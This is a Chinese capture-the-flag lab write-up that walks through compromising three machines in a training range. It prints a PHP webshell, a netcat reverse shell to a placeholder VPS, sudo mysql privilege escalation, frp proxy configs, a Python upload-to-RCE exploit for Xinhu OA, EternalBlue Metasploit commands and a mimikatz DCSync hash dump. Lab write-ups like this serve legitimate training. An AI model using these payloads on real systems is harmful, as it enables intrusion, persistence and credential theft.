春秋云境Initial wp-西风网络安全

1、靶机1分析

这里进来是一个登录的页面，一些常规的手段都无效，于是我使用了FScan扫描，发现是一个Thinkphp的框架并且存在RCE漏洞

因此我们使用thinkphp漏洞利用工具，并且写入webshell

echo '<?php @eval($_POST["x"]); ?>' >shell.php

然后通过中国蚁剑连接，并且反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc vps地址 端口 >/tmp/f

成功反弹了shell，但是由于权限太低，我们需要提权

首先使用sudo -l枚举，结果发现sudo可以无密码运行/usr/bin/mysql

sudo -l

所以我们直接利用mysql提权：

sudo /usr/bin/mysql -e '! /bin/bash -p'

成功拿到了root权限

接下来为了方便操作我们将root的密码修改为123456

想要登录时发现，要求只能用公钥登录

我猜测靶机一可能没有开启密码登录，需要我们手动开启，于是我们将其开启并重启服务

printf 'PasswordAuthentication yesnKbdInteractiveAuthentication non' > /etc/ssh/sshd_config.d/99-allow-password.conf

sshd -t && systemctl reload ssh || systemctl restart ssh

最后成功连上了该靶机：

我们在root用户的文件夹内发现了flag

获得了flag1：

flag{60b53231-

二、二号靶机分析

之后我们先将fscan传进靶机一号中，并且通过ifconfig列出当前的ip

使用fscan扫描

发现了18有也有一个站点是一个办公系统，而如果要访问这个站点需要搭建代理，因此我们将使用frp搭建代理

配置frpc：

serverAddr = "你的vps地址"serverPort = 8888
[[proxies]]name       = "rsocks"type       = "tcp"remotePort = 6666 #你vps拿来作为代理的地址
[proxies.plugin]type     = "socks5" #使用sock5代理

配置frps:

bindPort = 8888 #你vps拿来作为跳板的端口

使用Proxiflter配置代理：

成功访问了第二个战点：

信呼协同OA这个系统有个poc可以直接getshell

import requestssession = requests.session()url_pre = 'http://172.22.1.18/'url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'data1 = {    'rempass': '0',    'jmpass': 'false',    'device': '1625884034525',    'ltype': '0',    'adminuser': 'YWRtaW4=',    'adminpass': 'YWRtaW4xMjM=',    'yanzm': ''}r = session.post(url1, data=data1)r = session.post(url2, files={'file': open('1.php', 'r+')})
filepath = str(r.json()['filepath'])filepath = "/" + filepath.split('.uptemp')[0] + '.php'id = r.json()['id']url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'r = session.get(url3)r = session.get(url_pre + filepath + "?1=system('dir")print(r.text)print(filepath)

我们写好一个一句话木马1.php在同目录下然后直接使用运行

<?php eval($_POST['pass']); ?>

成功注入，然后我们使用蚁剑连接

最后在管理员用户文件夹内发现了flag02：

解出了flag2：

2ce3-4813-87d4-

三、三号靶机分析

这里有一个Windows Server2008，这个系统很古老，可能存在永恒之蓝漏洞，因此我们可以使用msf打永恒之蓝试试

先配置好代理：

sudo vim /etc/proxychains4.conf

拉到最底下，加上

socks5 vps地址 映射端口

然后使用msf打永恒之蓝：

proxychains msfconsolesearch ms17_010use exploit/windows/smb/ms17_010_eternalblueshow optionset payload windows/x64/meterpreter/bind_tcpshow options set rhosts 172.22.1.21show optionsrun

成功打进去了

进来先看看系统信息：

似乎是个域，要打横向，我们先抓域的凭据：

load kiwi

接着导出域内hash

kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv

接着我们看到了Administrator的hash

administrator: 10cf89a850fb1cdbe6bb432b859164c8

因此我们可以使用CrackMapExec进行横向，由于前两个flag都在管理员用户目录内，因此我直接看管理员的用户目录，找到了第三个flag

解出flag3：

e8f88d0d43d6}

因此最终的flag就是：

flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}

版权声明 1 本网站名称：西风网络安全
2 本网站网址：https://www.xifengwangan.cn
3 本网站的文章部分内容可能来源于网络，如有侵权，请联系站长 QQ1606798654 进行删除处理。
4 本网站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
5 本网站一律禁止以任何方式发布或转载任何违法的相关信息，访客发现请向站长举报
6 本网站资源存储在服务器中，如发现链接失效，请联系我们，我们会第一时间更新。

THE END